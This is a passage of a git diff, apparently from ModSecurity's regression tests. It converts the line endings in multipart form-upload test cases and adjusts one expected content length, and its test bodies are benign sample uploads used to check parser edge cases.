"uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -51,7 +51,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME" + "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME" }, "rules":[ "SecRuleEngine On", @@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "This is another very small test file..\r", - "----------------------------756b6d74fa1a8ee2--\r" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" ] }, "response":{ @@ -110,7 +110,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME" + "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME" }, "rules":[ "SecRuleEngine On", diff --git a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json index 1669589e9d..12700963db 100644 --- a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json +++ b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json @@ -23,16 +23,16 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm1", - "Content-Type: image/jpeg", - "", - "1", - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm2", - "", - "2", - "-------------------------------69343412719991675451336310646--" + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm1\n", + "Content-Type: image/jpeg\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm2\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" ] }, "response":{ @@ -78,16 +78,16 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm1", - "Content-Type: image/jpeg", - "", - "1", - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm2", - "", - "2", - "-------------------------------69343412719991675451336310646--" + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm1\n", + "Content-Type: image/jpeg\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm2\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json b/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json index 3967f78744..6270c383e3 100644 --- a/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json +++ b/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -141,21 +141,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--whee." + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--whee.\n" ] }, "response":{ @@ -200,21 +200,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -259,21 +259,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name='filedata'; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name='filedata'; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -318,11 +318,11 @@ "uri":"/", "method":"POST", "body":[ - "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?", - "Content-Disposition: form-data; name=\"name\"", - "", - "1", - "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?--" + "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "1\n", + "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?--\n" ] }, "response":{ @@ -367,21 +367,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=file'data; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=file'data; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json b/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json index 97b34d5552..e1c5dde4ce 100644 --- a/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json +++ b/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json b/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json index 029a65bd08..4761580620 100644 --- a/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json +++ b/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json @@ -102,20 +102,20 @@ "http_version":1.1, "method":"POST", "body": [ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file.." + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-REQUEST_BODY.json b/test/test-cases/regression/variable-REQUEST_BODY.json index 9a1dacba8b..93e0f5e6d6 100644 --- a/test/test-cases/regression/variable-REQUEST_BODY.json +++ b/test/test-cases/regression/variable-REQUEST_BODY.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json b/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json index 584b9e9ce6..8ce7834c08 100644 --- a/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json +++ b/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json b/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json index f71bc707c7..e8c5334839 100644 --- a/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json +++ b/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json @@ -32,7 +32,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"9\" \\(Variable: RESPONSE_CONTENT_LENGTH\\)" + "debug_log":"Target value: \"8\" \\(Variable: RESPONSE_CONTENT_LENGTH\\)" }, "rules":[ "SecRuleEngine On", From e03f8a18d5f63398ec185c7b11a458f6365db0b3 Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Sun, 25 Jan 2026 21:04:37 +0900 Subject: [PATCH 03/29] Replace CRLF to LF in test case JSON files --- .../request-body-parser-multipart.json | 4896 ++++++++--------- .../variable-MULTIPART_CRLF_LF_LINES.json | 242 +- .../variable-MULTIPART_FILENAME.json | 242 +- ...able-MULTIPART_INVALID_HEADER_FOLDING.json | 122 +- .../regression/variable-MULTIPART_NAME.json | 242 +- .../variable-MULTIPART_PART_HEADERS.json | 436 +- 6 files changed, 3090 insertions(+), 3090 deletions(-) diff --git a/test/test-cases/regression/request-body-parser-multipart.json b/test/test-cases/regression/request-body-parser-multipart.json index 1c5586fcf7..9b23f78913 100644 --- a/test/test-cases/regression/request-body-parser-multipart.json +++ b/test/test-cases/regression/request-body-parser-multipart.json @@ -1,2451 +1,2451 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (normal)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r\n", - "Content-Disposition: form-data; name=\"name\"\r\n", - "\r\n", - "Brian Rectanus\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"email\"\r\n", - "\r\n", - "brian.rectanus@breach.com\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n", - "Content-Type: image/jpeg\r\n", - "\r\n", - "BINARYDATA\r\n", - "--0000--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Added file part to the list: name \"image\" file name \"image.jpg\" \\(offset 258, length 10\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (final CRLF)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (no final CRLF)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary contains \"boundary\")", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------------------------------boundary", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--------------------------------------------------boundary\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "--------------------------------------------------boundary\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "--------------------------------------------------boundary--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary contains \"bOuNdArY\")", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------0xKhTmLbOuNdArY", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------0xKhTmLbOuNdArY\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "----------0xKhTmLbOuNdArY\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "----------0xKhTmLbOuNdArY--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (data contains \"--\")", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "--test\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "--\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"--test\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (no final boundary)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Final boundary missing" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (no disposition)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - 